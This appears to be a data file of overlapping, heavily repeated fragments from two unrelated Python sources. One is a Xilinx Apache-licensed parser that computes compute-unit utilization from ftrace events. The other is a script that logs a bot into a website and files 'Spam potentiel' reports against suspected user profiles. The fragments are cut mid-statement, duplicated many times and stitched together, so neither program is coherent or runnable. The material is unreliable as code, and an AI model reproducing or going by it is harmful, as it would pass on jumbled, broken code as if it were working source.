== 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start", "hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st,", "the License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self):", "http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software", "2019 Xilinx Inc. # Licensed under the Apache License, Version 2.0 (the \"License\");", "the specific language governing permissions and # limitations under the License. import parser.parserBase", "class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents", "# http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing,", "ANY KIND, either express or implied. # See the License for the specific", "totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = []", "start = 0 for e in cuEvents[core]: eventType = e.func if eventType ==", "runT = 0 start = 0 for e in cuEvents[core]: eventType = e.func", "in compliance with the License. # You may obtain a copy of the", "coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = []", "e.timeStamp elif eventType == 'cu_done': if start == 0: continue # prefix, i.pid,", "[] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap']", "cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "use this file except in compliance with the License. # You may obtain", "cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT =", "% hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\":", "#cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for l in data:", "= [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT", "print(\"##### Util of %s: %.2f\" % (core, runT * 100 / totalT)) return", "not use this file except in compliance with the License. # You may", "= [] runT = 0 start = 0 for e in cuEvents[core]: eventType", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "License, Version 2.0 (the \"License\"); # you may not use this file except", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or", "for l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID =", "parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options):", "- cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT = 0", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"])", "cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"#####", "cuRetData[core] = [] runT = 0 start = 0 for e in cuEvents[core]:", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {}", "data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx)", "options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for l in", "OF ANY KIND, either express or implied. # See the License for the", "= {} cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l, options)", "2.0 (the \"License\"); # you may not use this file except in compliance", "start) else: continue print(\"##### Util of %s: %.2f\" % (core, runT * 100", "obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by", "= \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event)", "options['cuMap'] cuEvents = {} cuRetData = {} for l in data: event =", "copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law", "# you may not use this file except in compliance with the License.", "{} cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l, options) idx", "parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not", "start = e.timeStamp elif eventType == 'cu_done': if start == 0: continue #", "agreed to in writing, software # distributed under the License is distributed on", "start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util of", "= cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT", "in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "__init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData", "if coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et],", "cuEvents = {} cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l,", "at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in", "(the \"License\"); # you may not use this file except in compliance with", "permissions and # limitations under the License. import parser.parserBase import parser.ftraceUtil CUs =", "eventType == 'cu_done': if start == 0: continue # prefix, i.pid, i.startTime, i.endTime,", "runT += (e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\" %", "License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to", "# Copyright 2019 Xilinx Inc. # Licensed under the Apache License, Version 2.0", "event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if", "== 0: continue cuRetData[core] = [] runT = 0 start = 0 for", "in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core]", "express or implied. # See the License for the specific language governing permissions", "import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data,", "...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT ==", "Version 2.0 (the \"License\"); # you may not use this file except in", "# Unless required by applicable law or agreed to in writing, software #", "except in compliance with the License. # You may obtain a copy of", "88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util", "options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in", "by applicable law or agreed to in writing, software # distributed under the", "idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys():", "0 start = 0 for e in cuEvents[core]: eventType = e.func if eventType", "- start) else: continue print(\"##### Util of %s: %.2f\" % (core, runT *", "prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp", "either express or implied. # See the License for the specific language governing", "== 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp,", "Xilinx Inc. # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "\"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\"", "l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\"", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "limitations under the License. import parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser):", "data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData = {} for l", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "# You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 #", "cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp", "eventType = e.func if eventType == 'cu_start': start = e.timeStamp elif eventType ==", "may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "governing permissions and # limitations under the License. import parser.parserBase import parser.ftraceUtil CUs", "et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT", "else: continue print(\"##### Util of %s: %.2f\" % (core, runT * 100 /", "cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys():", "e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue print(\"##### Util of %s:", "file except in compliance with the License. # You may obtain a copy", "for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if totalT == 0:", "License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0", "in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" %", "i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start)", "def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {}", "= e.timeStamp elif eventType == 'cu_done': if start == 0: continue # prefix,", "event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID] =", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "== 'cu_done': if start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color", "License for the specific language governing permissions and # limitations under the License.", "{\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp", "the License. # You may obtain a copy of the License at #", "Inc. # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "[] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT =", "to in writing, software # distributed under the License is distributed on an", "= {} for l in data: event = parser.ftraceUtil.parse(l, options) idx = event.infoDetail['cu_idx']", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents =", "e.func if eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else: continue", "implied. # See the License for the specific language governing permissions and #", "\"License\"); # you may not use this file except in compliance with the", "[[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp - cuEvents[core][0].timeStamp if", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp -", "e in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start = e.timeStamp", "required by applicable law or agreed to in writing, software # distributed under", "parser.parserBase import parser.ftraceUtil CUs = [] class cuEdgeParser(parser.parserBase.Parser): def __init__(self): super().__init__('cuEdge') def parse(self,", "i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT += (e.timeStamp - start) else:", "coreID not in cuEvents.keys(): cuEvents[coreID] = [] cuEvents[coreID].append(event) \"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\"", "\"\"\"return {\"CU-dpu_1\": [[st, et], ...]}\"\"\" for core in cuEvents.keys(): totalT = cuEvents[core][-1].timeStamp -", "Copyright 2019 Xilinx Inc. # Licensed under the Apache License, Version 2.0 (the", "super().__init__('cuEdge') def parse(self, data, options): #cuMap = options['cuMap'] cuEvents = {} cuRetData =", "+= (e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\" % (core,", "applicable law or agreed to in writing, software # distributed under the License", "You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless", "cuRetData = {} for l in data: event = parser.ftraceUtil.parse(l, options) idx =", "specific language governing permissions and # limitations under the License. import parser.parserBase import", "continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start, e.timeStamp, \"#ee0000\"]) runT", "= options['cuMap'] cuEvents = {} cuRetData = {} for l in data: event", "or agreed to in writing, software # distributed under the License is distributed", "or implied. # See the License for the specific language governing permissions and", "for e in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start =", "start == 0: continue # prefix, i.pid, i.startTime, i.endTime, color cuRetData[core].append([\"thread\", 88, start,", "cuEvents[core][0].timeStamp if totalT == 0: continue cuRetData[core] = [] runT = 0 start", "= 0 for e in cuEvents[core]: eventType = e.func if eventType == 'cu_start':", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "= event.infoDetail['cu_idx'] coreID = \"TIMELINE-CU_%s\" % hex(idx) if coreID not in cuEvents.keys(): cuEvents[coreID]", "if totalT == 0: continue cuRetData[core] = [] runT = 0 start =", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "0: continue cuRetData[core] = [] runT = 0 start = 0 for e", "'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start == 0: continue", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "(e.timeStamp - start) else: continue print(\"##### Util of %s: %.2f\" % (core, runT", "eventType == 'cu_start': start = e.timeStamp elif eventType == 'cu_done': if start ==", "with the License. # You may obtain a copy of the License at", "cuEvents[core]: eventType = e.func if eventType == 'cu_start': start = e.timeStamp elif eventType", "in writing, software # distributed under the License is distributed on an \"AS", "in cuEvents[core]: eventType = e.func if eventType == 'cu_start': start = e.timeStamp elif", "under the Apache License, Version 2.0 (the \"License\"); # you may not use" ]
[ "= profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\")", "\"Spam potentiel\" } s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status()", "\"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if", "import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\"", "login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>,", "login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url", "if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url,", "referer = login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req", "= profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\")", "in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status() referer", "Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\")", "= login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not", "profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for", "Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer", "referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for", "referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url =", "= { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\"", "in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer", "for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url", "} profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\"", "import BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url", "in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req", "username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup", "login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\")", "= login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req =", "= s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\",", "profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session()", "login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form =", "s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\")", "profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el", "login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\")", "bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = {", "el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending", "in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] =", "= \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\"", "for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data:", "# Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status()", "\"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id", "action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in", "el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req =", "requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup =", "data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\":", "profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not", "profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" }", "login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True):", "= \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s = requests.session() #", "} s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer =", "BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in", "= el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url #", "login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form", "= s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in", "alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer =", "= \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username, \"password\": <PASSWORD>, }", "from bs4 import BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url =", "\"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data =", "id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in el.attrs: if", "if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\":", "s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts", "not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data)", "requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data", "login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer})", "bs4 import BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\"", "\"reason\": \"Spam potentiel\" } s = requests.session() # Bot login login_page_req = s.get(website+login_page_url)", "in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] =", "send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = {", "potentiel\" } s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer", "login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer =", "s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status() referer = login_auth_req.url # Sending alerts for username in suspected_usernames:", "= login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in", "profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url", "el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req =", "\"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s =", "= \"/@\" profile_form_id = \"report-profile\" profile_form_data = { \"reason\": \"Spam potentiel\" } s", "= profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\" in", "= s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\",", "s = requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url", "in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup =", "# Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content,", "bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\": bot_username,", "bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data = { \"username\":", "{ \"username\": bot_username, \"password\": <PASSWORD>, } profile_page_url = \"/@\" profile_form_id = \"report-profile\" profile_form_data", "= requests.session() # Bot login login_page_req = s.get(website+login_page_url) login_page_req.raise_for_status() referer = login_page_req.url login_page_soup", "if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\":", "login_page_req.raise_for_status() referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for", "if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url,", "s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form = profile_page_soup.find(\"form\", id=profile_form_id)", "profile_form_data: profile_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) profile_alert_req = s.post(website+profile_form_url, data=profile_form_data) profile_alert_req.raise_for_status() referer =", "el in profile_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in profile_form_data: profile_form_data[el.attrs.get(\"name\")]", "def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url = \"/membres/connexion/?next=/\" login_form_data =", "\"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if \"name\" in el.attrs:", "profile_form = profile_page_soup.find(\"form\", id=profile_form_id) profile_form_url = profile_form.attrs.get(\"action\") for el in profile_form.find_all(name=True): if \"name\"", "login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = login_page_soup.find(\"form\", action=login_form_url) for el in login_form.find_all(name=True): if", "login_auth_req.url # Sending alerts for username in suspected_usernames: s.headers.update({\"referer\": referer}) profile_page_req = s.get(website+profile_page_url+username)", "for el in login_form.find_all(name=True): if \"name\" in el.attrs: if not el.attrs.get(\"name\") in login_form_data:", "in el.attrs: if not el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req", "= { \"reason\": \"Spam potentiel\" } s = requests.session() # Bot login login_page_req", "el.attrs.get(\"name\") in login_form_data: login_form_data[el.attrs.get(\"name\")] = el.attrs.get(\"value\") s.headers.update({\"referer\": referer}) login_auth_req = s.post(website+login_form_url, data=login_form_data) login_auth_req.raise_for_status()", "referer}) profile_page_req = s.get(website+profile_page_url+username) profile_page_req.raise_for_status() referer = profile_page_req.url profile_page_soup = BeautifulSoup(profile_page_req.content, \"lxml\") profile_form", "BeautifulSoup import requests def send_alerts(website, bot_username, bot_password, suspected_usernames): login_page_url = \"/membres/connexion/\" login_form_url =", "{ \"reason\": \"Spam potentiel\" } s = requests.session() # Bot login login_page_req =", "referer = login_page_req.url login_page_soup = BeautifulSoup(login_page_req.content, \"lxml\") login_form = 